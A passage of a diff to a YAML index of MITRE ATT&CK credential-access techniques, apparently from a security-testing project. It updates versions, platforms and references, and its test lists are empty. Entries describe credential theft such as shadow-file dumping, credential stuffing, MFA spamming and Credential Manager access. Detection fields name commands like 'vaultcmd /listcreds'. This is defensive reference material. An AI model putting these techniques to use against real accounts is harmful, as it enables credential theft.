   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -46945,11 +47700,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1606:
     technique:
-      modified: '2023-10-15T11:10:03.428Z'
+      modified: '2024-10-15T15:58:23.638Z'
       name: Forge Web Credentials
       description: "Adversaries may forge credential materials that can be used to
         gain access to web applications or Internet services. Web applications and
@@ -46993,11 +47747,10 @@ credential-access:
       - Windows
       - macOS
       - Linux
-      - Azure AD
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -47021,8 +47774,8 @@ credential-access:
         url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
       - source_name: GitHub AWS-ADFS-Credential-Generator
         description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
-          Retrieved December 16, 2020.
-        url: https://github.com/damianh/aws-adfs-credential-generator
+          Retrieved September 27, 2024.
+        url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
@@ -47038,11 +47791,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1621:
     technique:
-      modified: '2024-04-19T04:26:29.365Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication Request Generation
       description: |-
         Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -47053,11 +47805,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
       - Pawel Partyka, Microsoft 365 Defender
       - Shanief Webb
       - Obsidian Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
         logs for suspicious events: unusual login attempt source location, mismatch
@@ -47067,16 +47821,16 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
       - IaaS
       - SaaS
-      - Azure AD
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -47114,13 +47868,10 @@ credential-access:
         url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.008:
     technique:
-      modified: '2023-04-11T00:34:00.779Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Chat Messages
       description: |-
         Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -47129,6 +47880,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Douglas Weir
       x_mitre_deprecated: false
@@ -47136,11 +47888,11 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -47158,13 +47910,10 @@ credential-access:
         url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1212:
     technique:
-      modified: '2023-10-15T11:45:21.555Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Exploitation for Credential Access
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
@@ -47177,6 +47926,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
       - Mohit Rathore
@@ -47190,12 +47940,13 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      - Azure AD
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Process: Process Creation'
@@ -47227,17 +47978,14 @@ credential-access:
         url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
       - source_name: Microsoft Midnight Blizzard Replay Attack
         description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
-          Retrieved September 27, 2023.
-        url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+          Retrieved September 12, 2024.
+        url: https://x.com/MsftSecIntel/status/1671579359994343425
       - source_name: Technet MS14-068
         description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
           Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
         url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -47310,12 +48058,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1110:
     technique:
-      modified: '2024-01-29T18:53:26.593Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Brute Force
       description: |-
         Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -47324,6 +48071,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - David Fiser, @anu4is, Trend Micro
       - Alfredo Oliveira, Trend Micro
@@ -47342,18 +48090,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
@@ -47377,13 +48125,10 @@ credential-access:
         url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.004:
     technique:
-      modified: '2024-03-07T14:28:02.910Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Credential Stuffing'
       description: |-
         Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -47409,6 +48154,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Diogo Fernandes
       - Anastasios Pingios
@@ -47420,18 +48166,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'User Account: User Account Authentication'
@@ -47450,14 +48196,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.004
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -47486,24 +48229,26 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -47538,13 +48283,10 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1187:
     technique:
-      modified: '2023-08-14T19:30:45.123Z'
+      modified: '2024-10-15T16:33:34.508Z'
       name: Forced Authentication
       description: |-
         Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -47622,14 +48364,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Server_Message_Block
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1187
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -47645,6 +48386,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -47653,13 +48395,13 @@ credential-access:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -47667,15 +48409,11 @@ credential-access:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -47686,9 +48424,8 @@ credential-access:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -47734,7 +48471,7 @@ credential-access:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -47753,17 +48490,16 @@ credential-access:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -47796,10 +48532,9 @@ credential-access:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -47836,11 +48571,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.006:
     technique:
-      modified: '2023-09-30T20:24:19.357Z'
+      modified: '2024-10-15T14:20:16.722Z'
       name: Cloud Secrets Management Stores
       description: "Adversaries may acquire credentials from cloud-native secret management
         solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47908,34 +48642,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.008:
     technique:
-      x_mitre_platforms:
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
-      type: attack-pattern
-      created: '2020-02-11T18:46:56.263Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - url: https://attack.mitre.org/techniques/T1003/008
-        external_id: T1003.008
-        source_name: mitre-attack
-      - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
-          File Formats. Retrieved February 19, 2020.
-        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
-        source_name: Linux Password and Shadow File Formats
-      - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
-          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
-          2020.'
-        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
-        source_name: nixCraft - John the Ripper
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-25T20:48:04.491Z'
       name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
       description: |
         Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -47944,20 +48654,42 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
         distributions, can be used to watch for hostile processes attempting to access
         <code>/etc/passwd</code> and <code>/etc/shadow</code>, alerting on the pid,
         process name, and arguments of such programs.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+      created: '2020-02-11T18:46:56.263Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/008
+        external_id: T1003.008
+      - source_name: Linux Password and Shadow File Formats
+        description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+          File Formats. Retrieved February 19, 2020.
+        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+      - source_name: nixCraft - John the Ripper
+        description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+          2020.'
+        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.008
     atomic_tests: []
   T1558.002:
@@ -47989,7 +48721,7 @@ credential-access:
           from Memory. Retrieved October 11, 2019.
         url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
         source_name: Medium Detecting Attempts to Steal Passwords from Memory
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T21:46:46.831Z'
       name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
       description: |-
         Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -48015,13 +48747,11 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.002
     atomic_tests: []
   T1555.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:44:35.906Z'
       name: 'Credentials from Password Stores: Windows Credential Manager'
       description: |-
         Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -48038,24 +48768,24 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Bernaldo Penas Antelo
+      - Mugdha Peter Bansode
+      - Uriel Kosayev
+      - Vadim Khrykov
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor process and command-line parameters of <code>vaultcmd.exe</code> for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., <code>vaultcmd /listcreds:“Windows Credentials”</code>).(Citation: Malwarebytes The Windows Vault)
 
         Consider monitoring API calls such as <code>CredEnumerateA</code> that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
 
         Consider monitoring file reads to Vault locations, <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Bernaldo Penas Antelo
-      - Mugdha Peter Bansode
-      - Uriel Kosayev
-      - Vadim Khrykov
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -48096,36 +48826,13 @@ credential-access:
         url: https://www.passcape.com/windows_password_recovery_vault_explorer
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.004
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -48146,6 +48853,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -48160,52 +48868,42 @@ credential-access:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
